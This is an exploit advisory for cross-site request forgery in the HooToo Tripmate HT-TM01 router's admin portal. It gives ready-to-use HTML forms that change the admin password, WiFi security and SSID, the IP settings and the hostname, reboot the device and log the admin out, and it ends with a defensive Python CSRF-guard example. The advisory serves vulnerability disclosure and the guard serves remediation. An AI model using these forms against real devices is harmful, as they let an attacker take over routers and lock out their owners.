# Exploit Title: HooToo Tripmate HT-TM01 Cross Site Request Forgery
# Date: 03Sep15
# Exploit Author: Ken Smith
# Contact: https://twitter.com/P4tchw0rk
# Vendor Homepage: http://www.hootoo.com
# Version: HT-TM01, version 2.000.022

1. Description

Various functions in the device's admin web portal are vulnerable to Cross Site Request Forgery. Proof-of-concept HTML is provided below. For changes to wireless settings/security made via CSRF to take effect, a save and reset must be executed, either by the admin manually saving the settings through the portal or via the CSRF-vulnerable save and reset functions described below.

2. Proof of Concept

Change the device's hostname

<form action="http://10.10.10.254/protocol.csp?fname=system&opt=host&function=set" method="POST">
  <input type="hidden" name="name" value="CSRF123" />
  <input type="submit" value="Submit request" />
</form>

Change the region

<form action="http://10.10.10.254/protocol.csp?fname=net&opt=wifi_channel_region&function=set" method="POST">
  <input type="hidden" name="country" value="England" />
  <input type="submit" value="Submit request" />
</form>

Log the admin user out

<form action="http://10.10.10.254/index.csp?fname=logout" method="POST">
  <input type="submit" value="Submit request" />
</form>

Change the admin portal password

<form action="http://10.10.10.254/protocol.csp?fname=security&function=set" method="POST">
  <input type="hidden" name="name" value="admin" />
  <input type="hidden" name="opt" value="pwdmod" />
  <input type="hidden" name="pwd1" value="newpass" />
  <input type="hidden" name="pwd2" value="newpass" />
  <input type="submit" value="Submit request" />
</form>

Reboot the device

<form action="http://10.10.10.254/protocol.csp">
  <input type="hidden" name="fname" value="system" />
  <input type="hidden" name="opt" value="setting" />
  <input type="hidden" name="action" value="reboot" />
  <input type="hidden" name="function" value="set" />
  <input type="hidden" name="r" value="0.24464550580450606" />
  <input type="submit" value="Submit request" />
</form>

Save changed settings

<form action="http://10.10.10.254/protocol.csp">
  <input type="hidden" name="fname" value="storage" />
  <input type="hidden" name="opt" value="listen_disk" />
  <input type="hidden" name="function" value="get" />
  <input type="submit" value="Submit request" />
</form>

Change WiFi Security

<form action="http://10.10.10.254/protocol.csp?fname=net&opt=wifi_ap&function=set" method="POST">
  <input type="hidden" name="mode" value="4" />
  <input type="hidden" name="channel" value="1" />
  <input type="hidden" name="security" value="4" />
  <input type="hidden" name="hide_ssid" value="0" />
  <input type="hidden" name="HTBSSCoexistence" value="0" />
  <input type="hidden" name="SSID" value="CSRF" />
  <input type="hidden" name="passwd" value="Different-password" />
  <input type="submit" value="Submit request" />
</form>

Change network information

<form action="http://10.10.10.254/protocol.csp?fname=net&opt=wifi_lan_ip&function=set" method="POST">
  <input type="hidden" name="ip" value="10.10.10.123" />
  <input type="hidden" name="mask" value="255.255.255.0" />
  <input type="submit" value="Submit request" />
</form>
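The root cause in every form above is that protocol.csp applies a write (function=set, action=reboot) for any request that carries an admin session cookie, regardless of where the request came from. The following added example (not part of the advisory, and not the device's firmware) is a hypothetical server-side guard showing the standard fix: state changes only via POST, Origin/Referer must match the portal's own origin, and a per-session csrf_token must be present in the form body. The trusted origin and request shapes are taken from the PoC above; the session token, attacker origin and header values are constructed.

```python
from urllib.parse import urlsplit, parse_qs
import hmac

# The portal's own origin, taken from the advisory's PoC URLs.
TRUSTED_ORIGINS = {"http://10.10.10.254"}
SESSION_TOKEN = "constructed-per-session-token"   # constructed sample value

# Requests rebuilt from the advisory's PoC forms (headers/bodies constructed).
REBOOT_GET = ("http://10.10.10.254/protocol.csp?fname=system&opt=setting"
              "&action=reboot&function=set&r=0.24464550580450606")
PWD_POST_URL = "http://10.10.10.254/protocol.csp?fname=security&function=set"
PWD_POST_BODY = "name=admin&opt=pwdmod&pwd1=newpass&pwd2=newpass"

def request_params(method, url, body):
    """Merge query-string and form-body fields the way protocol.csp sees them."""
    params = {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}
    if method == "POST":
        params.update({k: v[0] for k, v in parse_qs(body).items()})
    return params

def is_state_changing(method, params):
    """Any POST, or a GET carrying function=set / action=reboot, is a write."""
    return (method == "POST" or params.get("function") == "set"
            or params.get("action") == "reboot")

def csrf_verdict(method, url, headers, body="", session_token=SESSION_TOKEN):
    """Return (allowed, reason) for one request. Hypothetical guard, not firmware code."""
    params = request_params(method, url, body)
    if not is_state_changing(method, params):
        return True, "read-only request"
    if method != "POST":
        return False, "state-changing request must be a POST"
    # Origin (or Referer as a fallback) must name the portal itself.
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False, "missing Origin/Referer"
    src = urlsplit(source)
    if f"{src.scheme}://{src.netloc}" not in TRUSTED_ORIGINS:
        return False, f"cross-origin request from {src.scheme}://{src.netloc}"
    # A per-session token in the form defeats forged POSTs even if headers are absent.
    if not hmac.compare_digest(params.get("csrf_token", ""), session_token):
        return False, "missing or wrong csrf_token"
    return True, "ok"

if __name__ == "__main__":
    print(csrf_verdict("GET", REBOOT_GET, {}))
    print(csrf_verdict("POST", PWD_POST_URL, {"Origin": "http://attacker.example"}, PWD_POST_BODY))
    print(csrf_verdict("POST", PWD_POST_URL, {"Origin": "http://10.10.10.254"},
                       PWD_POST_BODY + "&csrf_token=" + SESSION_TOKEN))
```

Note that the advisory's "Save changed settings" request is a GET with function=get that nevertheless commits settings, so classifying writes by parameter alone would let it through; the server must also stop performing side effects on function=get requests.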